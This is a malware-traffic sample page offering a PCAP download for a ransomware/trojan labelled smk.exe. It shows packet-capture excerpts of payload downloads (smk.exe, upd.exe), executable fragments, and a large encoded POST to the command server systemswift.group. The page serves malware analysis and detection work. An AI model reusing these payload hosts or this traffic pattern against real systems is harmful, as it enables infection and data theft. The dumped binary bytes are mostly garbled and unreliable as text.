Text Example

smk.exe systemswift.group Ransomware Malware Trojan Download PCAP file Download Traffic Sample

Download Attachments

  • 1 pcap smk
    Date added: May 30, 2019 8:49 am Added by: admin File size: 9 MB Downloads: 13

2019-05-30 00:27:40.790210 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3141076432:3141076852, ack 132281672, win 16425, length 420: HTTP: GET /smk.exe HTTP/1.1
E…..@…..
.
.
.
.. .P.9….uHP.@)D…GET /smk.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:27:41.270451 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
E…..@.@.DX
.
.
.
..P. …..9.tP…+……………………………………………………………………………………………………………………………………………………………………………………………….
……………………………………………………………………………………………………………………………………………………………………………………………………………….
………………………………………………………………………………………………………………P.,…….00………… ………………..h……….. .. …. …. …….00…. ..%………….
…..L.-. .-………….Y.-.(.-………….f.-.<.-………….r.-.D.-…………………~.-…….-…-…-…-…….-…….-…..ADVAPI32.dll.KERNEL32.DLL.MSIMG32.dll.USER32.dll….RegEnumKeyA…ExitProcess…GetProcAddress..Lo adLibraryA..VirtualProtect..AlphaBlend..CreateIcon………………………….. 2019-05-30 00:27:41.471058 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
E…..@.@.DW
.2019-05-30 00:28:45.641573 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1442212575:1442212995, ack 1861255134, win 16425, length 420: HTTP: GET /upd.exe HTTP/1.1
E…..@…..
.
.
.
..!.PU.j.n…P.@)….GET /upd.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:31:43.342932 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 3366683940:3366684106, ack 1501580209, win 16425, length 166: HTTP: POST /index.php HTTP/1.1
E….1@…-P
.
.W.X..$.P…$Y.K.P.@)….POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: systemswift.group
Content-Length: 43647
Cache-Control: no-cache

2019-05-30 00:31:43.903892 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 42506:43813, ack 1, win 16425, length 1307: HTTP
E..C.V@…(.
.
.W.X..$.P..+.Y.K.P.@)H…|.[0.m}.*u.S..#u.#u.#u.#..6a.#u.#g.6f.K/. ..Vu.l .wo.2X.D0.Q..9u.3a...j1.lu.m3...w4.g4.gu.D..D’.s=.&.B1.s!.qX.Q..G..@=.j;.gu.GX.Q..#..:.f’.N<.q:.#..j#.qX.Q..#..e9.!.qu.j&.o4.#..j#.qX.._. X.X..p!.nu.q:.f&.^X. ..p!.nX. \.n&.-0.fX.&.p&.f-...j;.m<.-0.fX. &.q#.0.-0.fX. \.u6.l&.-0.fX. \.g9.k:.w{.{0. \. 1.o=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.=.p!.f-... .t8.f-... &.=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.l:.p#.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. ..b'.k..g0.f'.f-.._. \.f4.=.q:.l6.o..p!.f-... .f4.¨C11C&.p&.f-..¨C19C.G#.U..H’.B..n8.Ke.-0.fX.v%.Xd.-0.fu..¨C20C. ..q:.w9.+m.5{.-g.2m.._.HT..U..U..U..U..(…..U#.U.+U..U..U..u..U..U.A’.t&.q&.@:.h<.p .m!.q;.w..s9.q0.O:.-!.w…W..[..U..U..U.R…U…..U..U..U..T.#U…..U.l:.j0.j&.-!.w…W..[..U..U..U.&..l…:?.U..U..U..T.#U…..U.¨C12C.1c.1..4m.Bf.5d.7..3x.A…f.1b.5a.Gf.Ax.7…a.Gb.;¨C13C.E`.:..1..6f.4b.Ex.1m..a.7d.Bc.2x.2g.5g.3b.6..3c..a.7e.A..1x.Bg.Ec.2..1..6a.Ex.7…m.Ef.Gl.3..2l.2g. 2019-05-30 00:31:44.415010 IP 87.251.88.11.80 > 10.1.10.162.49188: Flags [P.], seq 1:192, ack 43813, win 32, length 191: HTTP: HTTP/1.1 200 OK
E …:@./…W.X.
.
..P.$Y.K…0IP.. .o..HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 May 2019 04:31:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.6.40

Leave a Reply